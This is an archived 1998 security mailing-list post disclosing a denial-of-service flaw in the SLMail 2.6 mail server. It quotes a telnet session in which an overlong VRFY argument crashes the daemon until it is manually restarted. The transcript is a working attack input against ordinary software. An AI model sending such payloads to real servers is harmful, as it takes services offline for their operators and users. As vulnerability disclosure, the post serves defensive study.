|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
SLMail 2.6 DoS - Imail also
Jon (steven
EFNI.COM)Wed, 11 Mar 1998 21:22:52 -0500
- Messages sorted by: [ date ][ thread ][ subject ][ author ]
- Next message: John Robinson: "Winsock 2.0 DoS"
- Previous message: Steven: "SLMail 2.6 DoS"
- Next in thread: Mark Symons: "Re: SLMail 2.6 DoS - Imail also"
I had wrote earlier: > > Hello, > > I have recently found a quite serious DoS attack for the SLMail > 2.6 email daemon (www.seattlelabs.com/slmail). A long string of text > after a command makes the program crash. I have only tested this on > 2.6, so I'm not sure if other versions are vulnerable. > > craphole:~$ telnet www.victim.com 25 > Trying 555.55.555.55... > Connected to www.victim.com. > Escape character is '^]'. > 220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here > vrfy > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd > Connection closed by foreign host. > > craphole:~$ telnet www.victim.com 25 > Trying 555.55.555.55... > telnet: Unable to connect to remote host: Connection refused > craphole:~$ > > It will stay unresponsive until manually restarted. I haven't > mailed Seattle Labs about this, but I'm sure they'll figure it out. > > Later, > > Cisc0
- Next message: John Robinson: "Winsock 2.0 DoS"
- Previous message: Steven: "SLMail 2.6 DoS"
- Next in thread: Mark Symons: "Re: SLMail 2.6 DoS - Imail also"